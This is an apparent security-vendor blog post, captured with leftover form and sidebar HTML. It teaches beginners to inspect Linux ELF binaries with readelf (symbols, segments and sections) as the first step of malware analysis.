of">Korea, Republic of</option><option value="Kosovo">Kosovo</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Lao People&#039;s Democratic Republic">Lao People&#039;s Democratic Republic</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macau">Macau</option><option value="Macedonia, Rep. of">Macedonia, Rep. of</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mexico">Mexico</option><option value="Micronesia, Federal States of">Micronesia, Federal States of</option><option value="Moldova, Republic of">Moldova, Republic of</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar, Burma">Myanmar, Burma</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestinian territories">Palestinian territories</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Saint Kitts and Nevis">Saint Kitts and Nevis</option><option value="Saint Lucia">Saint Lucia</option><option value="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Sudan">South Sudan</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syria, Syrian Arab Republic">Syria, Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania; officially the United Republic of Tanzania">Tanzania; officially the United Republic of Tanzania</option><option value="Thailand">Thailand</option><option value="Tibet">Tibet</option><option value="Togo">Togo</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Vatican City State (Holy See)">Vatican City State (Holy See)</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select></span></p>
<div data-id="group-570" data-orig_data_id="group-570" data-clear_on_hide data-class="wpcf7cf_group">
 <span class="wpcf7-form-control-wrap mx_State"><select name="mx_State" class="wpcf7-form-control wpcf7-select wpcf7-validates-as-required country" aria-required="true" aria-invalid="false"><option value="">Select State</option><option value="Alabama">Alabama</option><option value="Alaska">Alaska</option><option value="American Samoa">American Samoa</option><option value="Arizona">Arizona</option><option value="Arkansas">Arkansas</option><option value="California">California</option><option value="Colorado">Colorado</option><option value="Connecticut">Connecticut</option><option value="Delaware">Delaware</option><option value="District of Columbia">District of Columbia</option><option value="Florida">Florida</option><option value="Georgia">Georgia</option><option value="Guam">Guam</option><option value="Hawaii">Hawaii</option><option value="Idaho">Idaho</option><option value="Illinois">Illinois</option><option value="Indiana">Indiana</option><option value="Iowa">Iowa</option><option value="Kansas">Kansas</option><option value="Kentucky">Kentucky</option><option value="Louisiana">Louisiana</option><option value="Maine">Maine</option><option value="Maryland">Maryland</option><option value="Massachusetts">Massachusetts</option><option value="Michigan">Michigan</option><option value="Minnesota">Minnesota</option><option value="Mississippi">Mississippi</option><option value="Missouri">Missouri</option><option value="Montana">Montana</option><option value="Nebraska">Nebraska</option><option value="Nevada">Nevada</option><option value="New Hampshire">New Hampshire</option><option value="New Jersey">New Jersey</option><option value="New Mexico">New Mexico</option><option value="New York">New York</option><option value="North Carolina">North Carolina</option><option value="North Dakota">North Dakota</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Ohio">Ohio</option><option value="Oklahoma">Oklahoma</option><option value="Oregon">Oregon</option><option value="Pennsylvania">Pennsylvania</option><option value="Puerto Rico">Puerto Rico</option><option value="Rhode Island">Rhode Island</option><option value="South Carolina">South Carolina</option><option value="South Dakota">South Dakota</option><option value="Tennessee">Tennessee</option><option value="Texas">Texas</option><option value="United States Minor Outlying Islands">United States Minor Outlying Islands</option><option value="Utah">Utah</option><option value="Vermont">Vermont</option><option value="Virgin Islands">Virgin Islands</option><option value="Virginia">Virginia</option><option value="Washington">Washington</option><option value="West Virginia">West Virginia</option><option value="Wisconsin">Wisconsin</option><option value="Wyoming">Wyoming</option></select></span>
</div>
</div>
<input type="hidden" name="form-title" value="" class="wpcf7-form-control wpcf7-hidden form-title" />
<div class="cf-field cf-submit">
<input type="submit" value="Subscribe" class="wpcf7-form-control has-spinner wpcf7-submit btn btn-primary" />
</div>
<div class="wpcf7-response-output" aria-hidden="true"></div></form></div><div class="side-blog-btn side-blog-btn-simple"><div>Get Free Account</div><a href="//analyze.intezer.com" class="btn btn-prim dodger blog-side-cta">Get started</a></div><div class="side-blog-btn side-blog-btn-fancy"><a class="blog-side-join blog-side-cta" href="https://analyze.intezer.com/"><img src="/wp-content/uploads/2022/03/intezer-cube.png"/><h3>Get Free Account</h3><div class="join-btn">Join Now</div></a></div><div class="side-blog-share"">Share article<div class="a2a_kit a2a_kit_size_ addtoany_list" data-a2a-url="https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/" data-a2a-title="ELF Malware Analysis 101 Part 2: Initial Analysis "><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.intezer.com%2Fblog%2Fmalware-analysis%2Felf-malware-analysis-101-initial-analysis%2F&amp;linkname=ELF%20Malware%20Analysis%20101%20Part%202%3A%20Initial%20Analysis%C2%A0" title="Facebook" rel="nofollow noopener" target="_blank"><img src="/wp-content/themes/intezer-v2/images/social/facebook.png" alt="Facebook"></a><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fwww.intezer.com%2Fblog%2Fmalware-analysis%2Felf-malware-analysis-101-initial-analysis%2F&amp;linkname=ELF%20Malware%20Analysis%20101%20Part%202%3A%20Initial%20Analysis%C2%A0" title="Twitter" rel="nofollow noopener" target="_blank"><img src="/wp-content/themes/intezer-v2/images/social/twitter.png" alt="Twitter"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.intezer.com%2Fblog%2Fmalware-analysis%2Felf-malware-analysis-101-initial-analysis%2F&amp;linkname=ELF%20Malware%20Analysis%20101%20Part%202%3A%20Initial%20Analysis%C2%A0" title="LinkedIn" rel="nofollow noopener" target="_blank"><img src="/wp-content/themes/intezer-v2/images/social/linkedin.png" alt="LinkedIn"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.intezer.com%2Fblog%2Fmalware-analysis%2Felf-malware-analysis-101-initial-analysis%2F&amp;linkname=ELF%20Malware%20Analysis%20101%20Part%202%3A%20Initial%20Analysis%C2%A0" title="Reddit" rel="nofollow noopener" target="_blank"><img src="/wp-content/themes/intezer-v2/images/social/reddit.png" alt="Reddit"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Fwww.intezer.com%2Fblog%2Fmalware-analysis%2Felf-malware-analysis-101-initial-analysis%2F&amp;linkname=ELF%20Malware%20Analysis%20101%20Part%202%3A%20Initial%20Analysis%C2%A0" title="Copy Link" rel="nofollow noopener" target="_blank"><img src="/wp-content/themes/intezer-v2/images/social/link.png" alt="Copy Link"></a></div></div>        <div class="top-posts">
            <h3>Top Blogs</h3>
            <div class="top-posts-cont owl-carousel"  id="owlposts" >
                    	    <div class="related-single item">
					<h4>
                        <a href="https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/">TeamTNT Cryptomining Explosion &#x1f9e8;</a>
                    </h4>
				                    <span class="post-excerpt">This post was originally published as a white paper in September 2021. Get the full...</span>	
                    <a href="https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/" class="top-more">Read more</a>
        		</div>
        	        	    <div class="related-single item">
					<h4>
                        <a href="https://www.intezer.com/blog/product-updates/automatically-scan-urls-and-analyze-malware/">Beyond Files: Automate URL Analysis with Intezer Analyze</a>
                    </h4>
				                    <span class="post-excerpt">As part of our ongoing effort to allow you to investigate any security incident, we...</span>	
                    <a href="https://www.intezer.com/blog/product-updates/automatically-scan-urls-and-analyze-malware/" class="top-more">Read more</a>
        		</div>
        	        	    <div class="related-single item">
					<h4>
                        <a href="https://www.intezer.com/blog/malware-analysis/save-incident-response-time-intezer-analyze/">3 Ways to Save Incident Response Time</a>
                    </h4>
				                    <span class="post-excerpt">Save time during incident response with these tips and tools to help your team accelerate...</span>	
                    <a href="https://www.intezer.com/blog/malware-analysis/save-incident-response-time-intezer-analyze/" class="top-more">Read more</a>
        		</div>
        	            </div>
        </div>
<link rel="stylesheet" href="/wp-content/themes/intezer-v2/css/owl.carousel.min.css">
<script type="text/javascript" src="/wp-content/themes/intezer-v2/js/owl.carousel.min.js"></script>
 <script type="text/javascript">

     $(document).ready(function() {
	 
  $("#owlposts").owlCarousel({
            items: 1,
            loop: true,
	  dots: true,
            center: true,
            margin: 0,
            rewind: false,
            autoplay: true,
            autoplayTimeout: 6000,
	  animateIn: 'fadeIn',
              animateOut: 'fadeOut',
      responsive:{
        0:{
            items:1
        },
        600:{
            items:1
        }
      },
      onInitialized:setDots,
      onChanged:setDots

        });
		 });




			       
	</script>
</div></div><div class="col-md-9 blog-main"><div class="single-post-content"><p><strong style="font-size: 20px;">Introduction</strong><br />
In the <a href="https://www.intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought/" target="_blank" rel="noopener noreferrer nofollow">previous article</a> we profiled the ELF malware landscape and explained how malware infects systems. We discussed the current lack of ELF malware visibility, reflected in subpar detection rates by leading engines and the shortage of publicly available resources documenting Linux threats. <strong>In this article we will pursue ELF file analysis with an emphasis on static analysis.</strong></p>
<p>The purpose of initial analysis is to gather as many insights about a file as possible without spending too much time on advanced analysis techniques such as behavioral analysis.</p>
<p>The initial analysis process entails reviewing different artifacts of a file. While an artifact by itself might not be enough to make a decision, the collection of artifacts can help us determine a practical outcome for this step. A final result could be that we know what the file is or we must conduct a deeper analysis because this step wasn’t conclusive enough.</p>
<p><strong style="font-size: 20px;">Agenda</strong><br />
The lack of valuable metadata in ELF files, such as certificates and resources, provides a weaker starting point than PE files, particularly when distinguishing between trusted and malicious files. This is why it’s important to consider the context of the analyzed file and the desired outcome from the analysis. Whether you want to verify that a file is trusted or malicious, or you already know that a file is malicious but you want to classify the threat to determine the appropriate response, the information and tools presented in this article will help you further support an initial analysis conclusion.</p>
<p>We will review the following artifacts and emphasize how they can help us gather insights about a file:</p>
<ol style="color: #627d98;">
<li>ELF format static components
<ol>
<li>Symbols</li>
<li>Segments and Sections</li>
<li>ELF Header</li>
</ol>
</li>
<li>File’s Output</li>
<li>Strings</li>
<li>Code Reuse</li>
<li>Packers</li>
<li>Interpreters</li>
</ol>
<p>After covering our initial analysis toolset, we will put them to use by analyzing real samples found in the wild.</p>
<p><strong style="font-size: 20px;">Toolset</strong><br />
These are the tools and commands we will use (in alphabetical order). We will elaborate on each of them later.</p>
<ol class="int-blg">
<li><a href="http://ntinfo.biz/index.html" target="_blank" rel="noopener noreferrer nofollow">Detect It Easy</a></li>
<li><a href="http://elfparser.com/" target="_blank" rel="noopener noreferrer nofollow">ElfParser </a></li>
<li><a href="https://analyze.intezer.com/" target="_blank" rel="noopener noreferrer nofollow">Intezer Analyze</a></li>
<li><a href="https://itsfoss.com/install-linux-in-virtualbox/" target="_blank" rel="noopener noreferrer nofollow">Linux VM</a></li>
<li><a href="https://linux.die.net/man/1/objcopy" target="_blank" rel="noopener noreferrer nofollow">objcopy</a></li>
<li><a href="https://www.pyinstaller.org/" target="_blank" rel="noopener noreferrer nofollow">Pyinstaller </a></li>
<li><a href="https://linux.die.net/man/1/readelf" target="_blank" rel="noopener noreferrer nofollow">readelf</a></li>
<li><a href="https://github.com/neurobin/shc" target="_blank" rel="noopener noreferrer nofollow">shc</a></li>
<li><a href="https://linux.die.net/man/1/strings" target="_blank" rel="noopener noreferrer nofollow">strings </a></li>
<li><a href="https://github.com/yanncam/UnSHc" target="_blank" rel="noopener noreferrer nofollow">UnSHc</a></li>
<li><a href="https://upx.github.io/" target="_blank" rel="noopener noreferrer nofollow">UPX </a></li>
<li><a href="http://vmpsoft.com/" target="_blank" rel="noopener noreferrer nofollow">VMprotect</a></li>
</ol>
<p><strong style="font-size: 20px;">Getting Started</strong><br />
We will use a Linux virtual machine (VM) as our demo environment. If you don’t have a Linux VM, follow this guide to install one: <a href="https://itsfoss.com/install-linux-in-virtualbox/" target="_blank" rel="noopener noreferrer nofollow">https://itsfoss.com/install-linux-in-virtualbox/</a>.</p>
<p>We will also be compiling different samples. If you are not interested in this step, we have stored the compiled samples in a <a href="https://github.com/intezer/ELF-Malware-Analysis-101/tree/master/Part-2-Initial-Analysis" target="_blank" rel="noopener noreferrer nofollow">dedicated repository</a> for your convenience. We will refer to the samples throughout the article.</p>
<p>Let’s prepare our environment:</p>
<ol style="color: #627d98;">
<li>Run your VM.</li>
<li>If you have just installed the VM, make sure to <a href="https://www.sysnettechsolutions.com/en/take-snapshot-virtualbox-windows-10/" rel="nofollow">take a snapshot</a> of the machine so you can always restore it to its clean snapshot.</li>
<li>Allow the shared clipboard to transfer from the Host to Guest:<br />
<img src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/1.png" alt="intezer" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/1.png?is-pending-load=1" srcset="" class=" jetpack-lazy-image"><noscript><img src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/1.png" alt="intezer"></noscript></li>
<li style="padding-top: 15px;">Compile the <a href="https://github.com/intezer/ELF-Malware-Analysis-101/blob/master/Part-2-Initial-Analysis/Article-samples/training_sample.c" target="_blank" rel="noopener noreferrer nofollow">following code</a> (you can download the <a href="https://github.com/intezer/ELF-Malware-Analysis-101/raw/master/Part-2-Initial-Analysis/Article-samples/training-sample" target="_blank" rel="noopener noreferrer nofollow">compiled file from here</a>):<img class="aligncenter size-full wp-image-11694 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/Untitled.png" data-slb-group="post-images" alt="intezer" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/Untitled.png?is-pending-load=1" srcset=""><noscript><img class="aligncenter size-full wp-image-11694" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/Untitled.png" alt="intezer"></noscript></li>
</ol>
<ol type="a">
<li style="color: #627d98;">Run <strong>nano training_sample.c</strong>, copy the code, and save (ctrl+x)</li>
<li style="color: #627d98;">Run <strong>gcc training_sample.c -o training-sample</strong></li>
</ol>
<p><strong style="font-size: 20px;">ELF Format Static Components</strong><br />
In this section we will review the components of the ELF format that are relevant for initial analysis, using our compiled file.</p>
<p>When analyzing static features of an ELF file, <strong>readelf</strong> command is the most useful tool. <strong>readelf</strong> should already be installed on your Linux VM. Run <strong>readelf -h</strong> to review all of its potential flags. We will use this command throughout the article.</p>
<p><strong style="font-size: 20px;">Symbols</strong><br />
<strong>Definition and how they can help us:</strong><br />
Symbols describe data types such as functions and variables which are stored in the source code and can be exported for debugging and linking purposes. Symbols can help us uncover which functions and variables were used by the developer in the code, giving us a better understanding of the binary’s functionalities. We might also find unique function or variable names that can be searched for online to determine if this is a known file—in other words, if someone has already analyzed a similar binary, or if this is an open source tool.</p>
<p><strong>In practice:</strong><br />
Let’s use the <strong>readelf</strong> command to read the file’s symbols.</p>
<p>First, run: <strong>readelf -s training-sample</strong></p>
<p>You will notice the output contains two tables: <strong>.dynsym</strong> and <strong>.symtab</strong>. The <strong>.dynsym</strong> table (dynamic symbols table) exists in dynamically linked and shared object files.</p>
<p><img loading="lazy" width="1283" height="485" class="aligncenter size-full wp-image-11683 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/2.png" alt="Intezer" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/2.png 1283w, https://www.intezer.com/wp-content/uploads/2020/08/2-300x113.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/2-1024x387.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/2-768x290.png 768w" data-lazy-sizes="(max-width: 1283px) 100vw, 1283px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/2.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1283" height="485" class="aligncenter size-full wp-image-11683" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/2.png" alt="Intezer" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/2.png 1283w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/2-300x113.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/2-1024x387.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/2-768x290.png 768w " sizes="(max-width: 1283px) 100vw, 1283px" /></noscript></p>
<p>Dynamically linked binaries use external sources such as libc libraries that are stored on the operating system during runtime. Statically linked binaries, on the other hand, are compiled together with these libraries. This means statically linked files will typically be larger than dynamically linked files. Statically linked files will likely contain large amounts of code that are related to libraries and not to the actual file’s logic.</p>
<p>The <strong>.dynsym</strong> table contains the dynamically linked symbols, such as libc functions, and the <strong>.symtab</strong> table contains all symbols (including those in the <strong>.dynsym</strong> table) that were defined in the source code. In the image above, you can see the libc function used in our source code under the <strong>.dynsym</strong> table: <strong>fgets(), popen(), and system()</strong>.</p>
<p>The symbol table can be lengthy. For simplicity, let’s view each symbol type separately.</p>
<ol style="color: #627d98;">
<li><strong>OBJECT</strong>: global variables declared in the code.</li>
<li><strong>FUNC</strong>: functions declared in the code.</li>
<li><strong>FILE</strong>: the source files that are compiled in the binary (This is a debug symbol. If the file was stripped from debug symbols, the symbols table won’t contain this type)</li>
</ol>
<p><strong>readelf -s training-sample | grep OBJECT</strong><br />
<img loading="lazy" width="1124" height="312" class="aligncenter size-full wp-image-11688 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/3.png" alt="Intezer" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/3.png 1124w, https://www.intezer.com/wp-content/uploads/2020/08/3-300x83.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/3-1024x284.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/3-768x213.png 768w" data-lazy-sizes="(max-width: 1124px) 100vw, 1124px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/3.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1124" height="312" class="aligncenter size-full wp-image-11688" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/3.png" alt="Intezer" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/3.png 1124w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/3-300x83.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/3-1024x284.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/3-768x213.png 768w " sizes="(max-width: 1124px) 100vw, 1124px" /></noscript></p>
<p>Above we can see the global variables that were declared in the file’s source code.</p>
<p><strong>readelf -s training-sample | grep FUNC</strong><br />
<img loading="lazy" width="1237" height="687" class="aligncenter size-full wp-image-11689 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/4.png" alt="intezer" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/4.png 1237w, https://www.intezer.com/wp-content/uploads/2020/08/4-300x167.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/4-1024x569.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/4-768x427.png 768w" data-lazy-sizes="(max-width: 1237px) 100vw, 1237px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/4.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1237" height="687" class="aligncenter size-full wp-image-11689" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/4.png" alt="intezer" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/4.png 1237w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/4-300x167.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/4-1024x569.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/4-768x427.png 768w " sizes="(max-width: 1237px) 100vw, 1237px" /></noscript></p>
<p>We can also observe the functions declared in the file’s source code, together with the used libc functions. The libc functions are present in both <strong>.dynsym</strong> and <strong>.symtab</strong> tables, which is why we see them both listed twice.</p>
<p><strong>readelf -s training-sample | grep FILE</strong><br />
<img loading="lazy" width="1015" height="118" class="aligncenter size-full wp-image-11691 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/5.png" alt="intezer" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/5.png 1015w, https://www.intezer.com/wp-content/uploads/2020/08/5-300x35.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/5-768x89.png 768w" data-lazy-sizes="(max-width: 1015px) 100vw, 1015px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/5.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1015" height="118" class="aligncenter size-full wp-image-11691" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/5.png" alt="intezer" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/5.png 1015w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/5-300x35.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/5-768x89.png 768w " sizes="(max-width: 1015px) 100vw, 1015px" /></noscript></p>
<p>The source files compiled in the binary are our source code (<strong>training_sample.c</strong>) and the <strong>ctrstuff.c</strong> file. The <strong>ctrstuff.c</strong> source code is compiled as default inside the binary. It contains functions that are used to run before and after the file’s main logic (<strong>register_tm_clones</strong>, <strong>register_tm_clones</strong>, and <strong>frame_dummy</strong> for example).</p>
<p><strong>Bottom Line</strong><br />
By interpreting the file’s symbols, you can extract the marked functions and variables from the compiled training sample’s source code:</p>
<p><img loading="lazy" width="687" height="608" class="aligncenter size-full wp-image-11692 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/6.png" alt="intezer" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/6.png 687w, https://www.intezer.com/wp-content/uploads/2020/08/6-300x266.png 300w" data-lazy-sizes="(max-width: 687px) 100vw, 687px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/6.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="687" height="608" class="aligncenter size-full wp-image-11692" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/6.png" alt="intezer" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/6.png 687w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/6-300x266.png 300w " sizes="(max-width: 687px) 100vw, 687px" /></noscript></p>
<p><a href="https://www.intezer.com/blog/elf/executable-linkable-format-101-part-2-symbols/" target="_blank" rel="noopener noreferrer nofollow">Browse here</a> for more context about symbols.</p>
<p><strong style="font-size: 20px;">Segments and Sections</strong><br />
<strong>Definition and how they can help us:</strong><br />
Segments, also known as program headers, describe the binary’s memory layout and they are necessary for execution. In some cases, anomalies in the segments table structure can help us determine if the binary is packed, or if the file was self-modified (a file infector for instance).</p>
<p>Segments can be divided into sections for linking and debugging purposes. The sections are complementary to the program headers and they are not necessary for the file’s execution. Symbols are usually retrieved via section information. Unique section names can help us identify different compilation methods.</p>
<p><strong>In practice:</strong><br />
Let’s review the training sample segments. Run <strong>readelf -l training-sample</strong>:</p>
<p><img loading="lazy" width="1054" height="1074" class="aligncenter size-full wp-image-11693 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7.png" alt="intezer" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7.png 1054w, https://www.intezer.com/wp-content/uploads/2020/08/7-294x300.png 294w, https://www.intezer.com/wp-content/uploads/2020/08/7-1005x1024.png 1005w, https://www.intezer.com/wp-content/uploads/2020/08/7-768x783.png 768w, https://www.intezer.com/wp-content/uploads/2020/08/7-50x50.png 50w, https://www.intezer.com/wp-content/uploads/2020/08/7-65x65.png 65w, https://www.intezer.com/wp-content/uploads/2020/08/7-66x66.png 66w, https://www.intezer.com/wp-content/uploads/2020/08/7-60x60.png 60w" data-lazy-sizes="(max-width: 1054px) 100vw, 1054px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1054" height="1074" class="aligncenter size-full wp-image-11693" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7.png" alt="intezer" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7.png 1054w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7-294x300.png 294w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7-1005x1024.png 1005w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7-768x783.png 768w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7-50x50.png 50w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7-65x65.png 65w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7-66x66.png 66w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7-60x60.png 60w " sizes="(max-width: 1054px) 100vw, 1054px" /></noscript></p>
<p>There are 9 program headers (segments) in the training sample. Each segment type describes a different component of the binary. We will focus on the <strong>PT_LOAD</strong> segment.</p>
<p><strong>PT_LOAD</strong> segment describes the code which is loaded into memory. Therefore, an executable file should always have at least one <strong>PT_LOAD</strong> segment. In the screenshot above you will see the training sample contains 2 <strong>PT_LOAD</strong> segments. Each segment has different flags:</p>
<ol style="color: #627d98;">
<li><strong>RE (read and execute) flags:</strong> This is the <strong>PT_LOAD</strong> segment that describes the executable code. The file’s entrypoint should be located inside this segment.</li>
<li><strong>RW (read and write) flags:</strong> This is the <strong>PT_LOAD</strong> segment that contains the file’s global variables and dynamic linking information.</li>
</ol>
<p>In the segments’ output we are also given a list of sections to segments mapping, in corresponding order to the segments table. Notice the <strong>.text</strong> section, which contains the executable code instructions, is mapped to the <strong>PT_LOAD R E</strong> segment.</p>
<p>The segments table structure of the training sample is an example of a “normal” structure.<br />
If the file was packed or self-modified, we would see the table structured differently.</p>
<div style="margin-top: 15px; color: #627d98;">This is an example of a segments table of a packed file:</div>
